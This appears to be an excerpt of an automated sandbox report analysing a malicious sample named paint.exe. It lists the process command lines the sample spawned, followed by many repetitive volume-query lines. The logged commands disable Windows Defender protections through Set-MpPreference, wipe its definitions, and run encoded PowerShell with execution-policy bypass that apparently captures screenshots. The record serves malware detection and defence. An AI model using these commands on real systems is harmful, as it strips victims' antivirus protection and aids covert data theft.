acaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,88_2_00007FF623E1B340
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF95E0 cpuid 0_2_00007FF6F0BF95E0
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
